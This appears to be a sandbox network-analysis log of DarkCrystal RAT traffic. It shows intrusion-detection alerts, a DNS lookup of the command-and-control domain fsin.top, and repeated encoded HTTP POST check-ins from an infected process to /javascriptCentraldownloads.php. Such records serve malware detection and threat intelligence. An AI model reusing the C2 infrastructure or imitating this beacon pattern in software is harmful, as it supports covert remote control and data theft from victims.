2025-01-11T16:21:17.906639+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62295 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:38.508513+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62410 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:05.602307+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62447 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:14.336703+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62448 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:17.243019+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62449 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:23.336697+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62450 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:25.793218+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62451 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:28.539834+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62452 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:31.033553+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 62453 | 37.44.238.250 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 16:20:12.809001923 CET | 50051 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 16:20:13.172413111 CET | 53 | 50051 | 1.1.1.1 | 192.168.2.4
Jan 11, 2025 16:20:43.452981949 CET | 53 | 60183 | 162.159.36.2 | 192.168.2.4
Jan 11, 2025 16:20:43.944248915 CET | 53 | 54765 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 16:20:12.809001923 CET | 192.168.2.4 | 1.1.1.1 | 0x1a98 | Standard query (0) | fsin.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 16:20:13.172413111 CET | 1.1.1.1 | 192.168.2.4 | 0x1a98 | No error (0) | fsin.top | | 37.44.238.250 | A (IP address) | IN (0x0001) | false
                                                                                    • fsin.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 37.44.238.250 | 80 | 8004 | C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:20:13.187067032 CET | 309 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:20:13.544842958 CET | 344 | OUT | Data Raw: 05 01 04 07 06 0c 04 02 05 06 02 01 02 06 01 0b 00 02 05 0e 02 04 03 00 02 02 0a 05 06 54 01 07 0e 07 04 5e 02 51 05 04 0b 01 06 01 05 0a 07 04 06 01 0f 0f 0f 04 07 00 07 0e 06 02 04 00 05 0e 03 00 0c 0a 04 07 04 09 0e 50 0f 07 0a 05 0c 53 07 56
    Data Ascii: T^QPSV[\L~k`rOt}u[tkU}t|l~p`{ldY{`_^}msTwtwZ~O~V@Bz}r}rW
Jan 11, 2025 16:20:13.831290007 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:20:13.961401939 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:20:13 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.4 | 49737 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:20:25.701231003 CET | 326 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:20:26.055428982 CET | 344 | OUT | Data Raw: 00 00 04 04 06 0a 01 03 05 06 02 01 02 01 01 0b 00 07 05 0d 02 0d 03 0e 02 0f 0c 06 06 0e 01 08 0e 02 04 5a 03 05 06 57 0e 03 07 07 07 01 07 51 06 01 0f 01 0f 52 04 06 07 05 04 06 06 52 04 0a 00 05 0c 0c 04 02 05 51 0d 07 0b 02 0e 0d 0b 07 02 05
    Data Ascii: ZWQRRQY[PWT\L}R`y^tbj\aKQRlaBtR||psXxgJ{`jC^N`g|~O~V@z}fbi
Jan 11, 2025 16:20:26.330375910 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:20:26.459547043 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:20:26 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.2.4 | 62175 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:20:52.229734898 CET | 273 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:20:52.586760998 CET | 344 | OUT | Data Raw: 00 02 04 04 06 0a 01 05 05 06 02 01 02 01 01 05 00 04 05 09 02 06 03 0b 03 05 0d 51 07 01 00 03 0f 54 03 0a 02 53 07 03 0b 01 04 07 05 56 07 51 04 50 0b 0c 0f 02 05 00 04 55 06 07 05 52 05 5f 03 02 0f 0b 04 00 06 53 0c 05 0d 02 0c 05 0d 00 06 07
    Data Ascii: QTSVQPUR_S^XU\L}U|cfM`LubeZ|Bz\tl|B|]wZxRUo^vh}|wgk_~_~V@{STN}\}
Jan 11, 2025 16:20:52.859142065 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:20:52.987699032 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:20:52 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.4 | 62196 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:21:00.515564919 CET | 308 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:21:00.868391037 CET | 344 | OUT | Data Raw: 00 07 01 06 03 0f 04 00 05 06 02 01 02 02 01 0a 00 02 05 08 02 02 03 09 03 56 0c 0c 04 01 02 02 0a 00 05 0e 02 0d 07 03 0e 54 07 07 05 06 04 00 06 53 0c 0a 0d 07 04 0a 06 50 06 50 07 00 00 09 05 06 0a 00 05 06 04 09 0e 03 0c 05 0d 54 0d 07 06 0d
    Data Ascii: VTSPPTS]P\L}Uk`~wLmMaetoi`UtB~p|JoBJx`~|}sTcYU]u~V@zmrA~\u
Jan 11, 2025 16:21:01.161000967 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:21:01.291775942 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:21:01 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
4 | 192.168.2.4 | 62218 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:21:04.718497992 CET | 326 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:21:05.071693897 CET | 344 | OUT | Data Raw: 00 03 04 01 06 0e 01 07 05 06 02 01 02 03 01 04 00 0a 05 0f 02 0c 03 08 00 53 0a 00 06 01 01 54 0f 52 07 0b 02 03 04 07 0d 03 06 03 06 04 06 00 04 53 0c 5a 0f 50 05 00 06 0f 04 06 07 02 06 0c 01 04 0d 01 04 0f 05 06 0b 02 0c 01 0c 02 0b 05 04 07
    Data Ascii: STRSZPSWRU\L~kYbtbaMwuPhRi`okX|hoBoxN_^m|Ntg`O}O~V@{C\rq
Jan 11, 2025 16:21:05.373030901 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:21:05.505287886 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:21:05 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.2.4 | 62254 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:21:10.445616961 CET | 326 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:21:10.789875031 CET | 344 | OUT | Data Raw: 05 07 04 0d 06 0d 04 05 05 06 02 01 02 07 01 00 00 04 05 08 02 03 03 0b 07 0f 0c 02 03 04 03 54 0a 04 07 0e 03 06 05 06 0c 00 06 0a 07 50 02 03 07 02 0f 08 0c 07 07 52 01 0e 06 04 06 07 06 0d 05 0a 0f 01 04 0e 07 05 0c 03 0b 02 0d 57 0e 06 07 06
    Data Ascii: TPRW\L~|v@c\aOu[p~lX\cl`k`lJxlXzcfI|mhtg`A~u~V@AxCTA~L}
Jan 11, 2025 16:21:11.083199024 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:21:11.212403059 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:21:11 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
6 | 192.168.2.4 | 62270 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:21:13.237759113 CET | 326 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:21:13.586749077 CET | 344 | OUT | Data Raw: 05 00 01 02 06 08 01 04 05 06 02 01 02 0d 01 01 00 06 05 01 02 06 03 00 07 04 0f 51 04 07 00 00 0e 00 03 0b 02 51 06 52 0f 03 06 0b 05 56 02 0f 05 0a 0b 0b 0d 52 04 56 06 05 06 50 01 04 05 58 05 05 0d 0c 06 00 04 04 0f 01 0c 53 0e 05 0c 09 07 56
    Data Ascii: QQRVRVPXSVW\L~hc~ca~_uhkiOwotO]Z{|glcfDkCpA`Y{]}_~V@xSb}\W
Jan 11, 2025 16:21:13.900506973 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:21:14.045902014 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:21:13 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
7 | 192.168.2.4 | 62295 | 37.44.238.250 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:21:17.127688885 CET | 326 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:21:17.477488041 CET | 344 | OUT | Data Raw: 05 00 04 06 06 08 01 06 05 06 02 01 02 0d 01 0b 00 02 05 0d 02 02 03 00 03 05 0c 03 07 0e 01 00 0a 01 04 5d 00 0c 05 0b 0d 0a 06 01 04 03 04 06 04 07 0f 59 0c 0e 06 07 06 00 06 04 04 07 04 58 00 0a 0a 00 04 07 07 07 0c 03 0f 07 0f 54 0d 06 04 02
    Data Ascii: ]YXTRQ\L}ShcfcamLb\wQkRu`p|Z|{l]xNaZhS]UwgxA~_~V@z}r~\W
Jan 11, 2025 16:21:17.776637077 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:21:17.906582117 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:21:17 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 62410 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:21:37.741867065 CET | 309 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:21:38.086774111 CET | 344 | OUT | Data Raw: 05 07 04 0c 06 00 01 0a 05 06 02 01 02 06 01 0a 00 04 05 0b 02 0d 03 09 02 56 0e 00 03 0e 01 52 0a 0f 07 0e 02 06 03 03 0f 53 06 02 06 04 07 06 06 0b 0c 59 0d 01 04 0a 06 07 06 04 04 04 07 5b 02 50 0c 0c 00 02 07 06 0e 07 0b 00 0d 51 0f 02 05 02
    Data Ascii: VRSY[PQZV\L}Rh^fc\n]a[oTko}cRw]hMk_loslYa^StvwQ[~_~V@BzmTLbu
Jan 11, 2025 16:21:38.419069052 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:21:38.567526102 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:21:38 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 62447 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 16:22:04.872351885 CET | 309 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: fsin.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Jan 11, 2025 16:22:05.227802038 CET | 344 | OUT | Data Raw: 00 00 04 02 06 01 01 07 05 06 02 01 02 06 01 07 00 02 05 0f 02 01 03 08 03 01 0d 07 04 55 03 03 0e 0e 06 0b 07 03 04 00 0c 0b 06 04 06 00 05 0e 03 03 0c 5d 0a 03 06 0a 01 01 06 50 06 02 00 0d 00 50 0c 01 05 54 04 03 0c 0f 0e 02 0c 01 0e 05 04 03
    Data Ascii: U]PPTV\L~@^e\tLuMbvt|RqOwooX~s]XloxX{YjK|}h`Ihju~V@B{}r~bq
Jan 11, 2025 16:22:05.536540985 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 16:22:05.667687893 CET | 376 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 15:22:05 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 213
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
